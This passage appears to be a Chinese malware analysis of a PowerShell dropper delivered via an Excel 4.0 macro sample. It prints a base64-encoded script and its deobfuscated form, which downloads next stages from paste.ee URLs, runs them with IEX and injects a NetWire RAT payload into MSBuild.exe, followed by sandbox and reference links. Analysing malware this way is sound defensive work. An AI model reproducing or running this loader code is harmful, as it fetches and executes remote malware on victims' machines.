AFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')
进一步解码得到,解混淆后的PowerShell脚本内容。
仔细阅读脚本内容后,发现前面是垃圾代码与增加延时,最后是通过调用CallByName下载下一阶段内容执行。地址//paste.ee/r/e49u0,//paste.ee/r/dlOMz。
Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf) $DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY'; $CWpvyyivlUxxUVObqdPlWq = 'bfi'; $rMoZw = 'yxapiZPoYWefF'; $rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy'; $YmiLoue = 'Jt'; $RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB'; } $ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx'; If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') { $SK = 'CveCYiWSRvzoQRCfK'; $HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq'; $SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI'; $YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt'; $cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP'; $vwPYEaIUoi = 'txTXptVqiYWHOiNf'; } $PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX'; DO{ $ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa'; $gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP'; $LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr'; $qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF'; $wBNpjezYQikY = 'JV'; $sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn'; $Nyi= $Nyi + 1;} While ($Nyi -ne 6) While ($WGgrdVmg -ne 6) { $DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL'; $WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj'; $WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb'; $WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV'; $WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs'; $WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv'; $WGgrdVmg= $WGgrdVmg + 1;} Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL) $fxsRRWGLdjAatTJAfkgXs = 'elVYxmYLjPrTMnvzopJPejLVx'; $qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA'; $EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin'; $fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR'; $FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg'; $seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV'; $yZlTWTedKQSpJGFWoZf = 'dvzKYu'; $GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb'; $bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW'; $eHqkuioTKriA = 'QrhqaXdgzmxGRrw'; $aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs'; $crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU'; $ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr'; $BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu'; } $nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez'; Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy) $FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI'; $XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO'; $TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY'; $YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak'; } $reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g'); [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic'); $fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX; [Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX; [k.Hackitup]::exe('MSBuild.exe',$f)
下载到第一个经解码后的文件,不过是已经经过处理得到的dll文件。
实际名称为Hackitup,如下可大致判断出后续会进行进程注入,结合上述的解码脚本内容,可发现注入的进程为MSBuild.exe。
下载到第二个文件,简单分析为NetWire RAT远控木马。
C2肯定已经失效了,但是也贴一下吧。
https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/
https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/
https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/
https://www.freebuf.com/articles/others-articles/236919.html
https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
https://zeronohacker.com/analysis-excel-4-0-marco-from-field-office-sample.html